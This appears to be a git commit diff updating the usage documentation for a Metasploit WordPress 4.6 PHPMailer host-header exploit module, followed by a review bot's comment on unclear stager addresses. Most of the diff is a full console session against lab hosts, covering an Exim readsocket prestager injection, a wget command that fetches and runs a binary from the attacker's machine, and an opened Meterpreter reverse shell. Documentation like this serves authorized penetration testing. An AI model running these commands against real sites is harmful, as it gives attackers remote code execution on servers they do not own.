Update doc with new usage
Also kick version down to 4.6, since I wasn't using the tag originally.
bug/bundler_fix
parent 5fd6cb0890
commit 8021b209ba
|
@ -29,34 +29,31 @@ You should see the Exim prestager commands being sent to the target.
|
|||
|
||||
## Usage
|
||||
|
||||
Please set the payload options. Some sane defaults are set, but you'll
|
||||
want to be as specific as possible.
|
||||
|
||||
```
|
||||
msf > use exploit/unix/webapp/wp_phpmailer_host_header
|
||||
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.152
|
||||
rhost => 192.168.33.152
|
||||
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
|
||||
rhost => 192.168.33.135
|
||||
msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
|
||||
targeturi => /wordpress-4.6
|
||||
msf exploit(wp_phpmailer_host_header) > set payload linux/x64/meterpreter_reverse_https
|
||||
payload => linux/x64/meterpreter_reverse_https
|
||||
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
|
||||
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
|
||||
lhost => 192.168.33.1
|
||||
msf exploit(wp_phpmailer_host_header) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(wp_phpmailer_host_header) > run
|
||||
|
||||
[*] Started HTTPS reverse handler on https://192.168.33.1:8443
|
||||
[*] WordPress 4.7 installed at http://192.168.33.152/wordpress-4.6
|
||||
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
|
||||
[*] Generating wget command stager
|
||||
[*] Using URL: http://0.0.0.0:8080/gzayjqwr
|
||||
[*] Local IP: http://192.168.1.7:8080/gzayjqwr
|
||||
[*] Using URL: http://0.0.0.0:8080/gdydmrcr
|
||||
[*] Local IP: http://192.168.1.7:8080/gdydmrcr
|
||||
[*] Generating and sending Exim prestager
|
||||
[*] Sending /bin/sh -c ${reduce{get /gzayjqwr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}}
|
||||
[*] https://192.168.33.1:8443 handling request from 192.168.33.152; (UUID: bwm9z08k) Redirecting stageless connection from /Dbyg6-yOlTQo9i70ceSG0wDDy1JAZjOS5ToQyoXw4zXBnF with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
|
||||
[*] https://192.168.33.1:8443 handling request from 192.168.33.152; (UUID: bwm9z08k) Attaching orphaned/stageless session...
|
||||
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.152:35138) at 2017-05-10 01:07:35 -0500
|
||||
[*] Sending /bin/rm -f /tmp/ovcixpnf
|
||||
[*] Sending /bin/sh -c ${reduce{get /gdydmrcr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}}
|
||||
[+] Sending wget${IFS}-qO${IFS}/tmp/kmbrvask${IFS}http://192.168.33.1:8080/gdydmrcr;chmod${IFS}+x${IFS}/tmp/kmbrvask;/tmp/kmbrvask;rm${IFS}-f${IFS}/tmp/kmbrvask
|
||||
[+] Sending payload linux/x64/meterpreter_reverse_https
|
||||
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Redirecting stageless connection from /z1Br4gDetykqSyxJc1FJDwUxRwi0zlaU3n8a4qzqQL0car3RRVt6pALb6kN5pFHhGyIHhgaEWcUYZqRQooYIhJarLi5v0 with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
|
||||
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Attaching orphaned/stageless session...
|
||||
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:35848) at 2017-05-15 21:26:17 -0500
|
||||
[*] Sending /bin/rm -f /tmp/kmbrvask
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter >
|
||||
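Review bot: The sample output shows two different addresses for the stager server without explanation: the "Local IP" line reads http://192.168.1.7:8080/gdydmrcr, while the wget command and the readsocket prestager both fetch from 192.168.33.1:8080, the value given to lhost. A reader on a multi-homed host cannot tell from the transcript which address the target has to reach, so the Usage text should say so in one sentence. The prose also only mentions "payload options", yet the transcript sets rhost, targeturi and verbose as well; naming the options that must be set would make "be as specific as possible" actionable.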